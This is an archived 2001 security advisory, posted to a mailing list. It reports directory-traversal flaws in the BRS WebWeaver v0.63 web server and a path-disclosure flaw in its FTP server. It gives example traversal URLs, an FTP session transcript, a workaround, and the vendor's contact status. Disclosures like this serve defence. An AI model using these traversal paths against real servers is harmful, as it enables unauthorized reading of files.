----- Begin Hush Signed Message from joetestaat_private ----- Vulnerabilities in BRS WebWeaver Overview BRS WebWeaver v0.63 is a combined ftp and web server available from http://bsoutham.home.dhs.org. Vulnerabilities exist in the web server which allow remote users to break out of the web root using relative paths (ie: '..', '...'). In addition, the ftp server can be made to disclose the physical path of the ftp root. Details The following URLs demonstrate the problem with the web server: http://localhost/syshelp/../[any file outside the web root] http://localhost/sysimages/../[any file outside the web root] http://localhost/scripts/../[any file outside the web root] The following is an illustration of the problem with the ftp server: >ftp localhost Connected to xxxxxxxxxxxx.rh.rit.edu. 220 BRS WebWeaver FTP Server ready. User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog 331 Password required for jdog. Password: 230 User jdog logged in. ftp> cd * 250 CWD command successful. "/*/" is current directory. ftp> ls 200 Port command successful. 150 Opening data connection for directory list. c:\windows\desktop\*\*.* not found 226 File sent ok ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec. ftp> Solution The web server root traversal vulnerabilities can be prevented by removing all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the ISAPI/CGI alias (ie: 'scripts'). There is no solution for the ftp root disclosure vulnerability. Vendor Status Blaine R Southam was contacted via <bsouthamat_private> on Saturday, April 21, 2001. No reply was received. - Joe Testa e-mail: joetestaat_private web page: http://hogs.rit.edu/~joet AIM: LordSpankatron ----- Begin Hush Signature v1.3 ----- CVqvkyjBiGMOAQcLrFNKLcRZLBW13KOe9d2JMMIzTrZhsT9l2ihsNcFO3G/yGOL2qAIx kMC9Z2ijFy/RRJEC02qDgHcL1vEMEq2LlU3cpY+zb3yZ8jb6AarulkaGbw4eEjD1R7ER t/Gyq2X++pHMSlsMU7151N9H5Vl4WcjsU/7kJQHqgglKD2EtjhdHi3BgWnBhyqVa8Mp/ IaVjpWAC3Pxa3kp3jdJ2IE4OE399GMh1brJJGAb/spWiAXbE+pTKq6Llu35DCex2QgtL n0LjgAsWom6PdZzCFyi6nfLvToMt1xr5TbJDnG0dvS6FYjQbiubcLRUEi+K1qSvE5+RD N+yAyPda+trSaJLd1O6o/kNse2KvntAtlexC/hRdrPxjX5F0guoFfaNhgPBQrssInM/+ gk6lgWNaEUV/AxyCRUvqenkMkBd19alQ5M6dY+XEpdDIB4/Mo9xic/ekbSmqcNmOHKyX T/DX0EMDxts6GI715LXY0Imv1jx52X1CuMGvBaVtuOal ----- End Hush Signature v1.3 ----- This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools Free, encrypted, secure Web-based email at www.hushmail.com
This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 17:39:14 PDT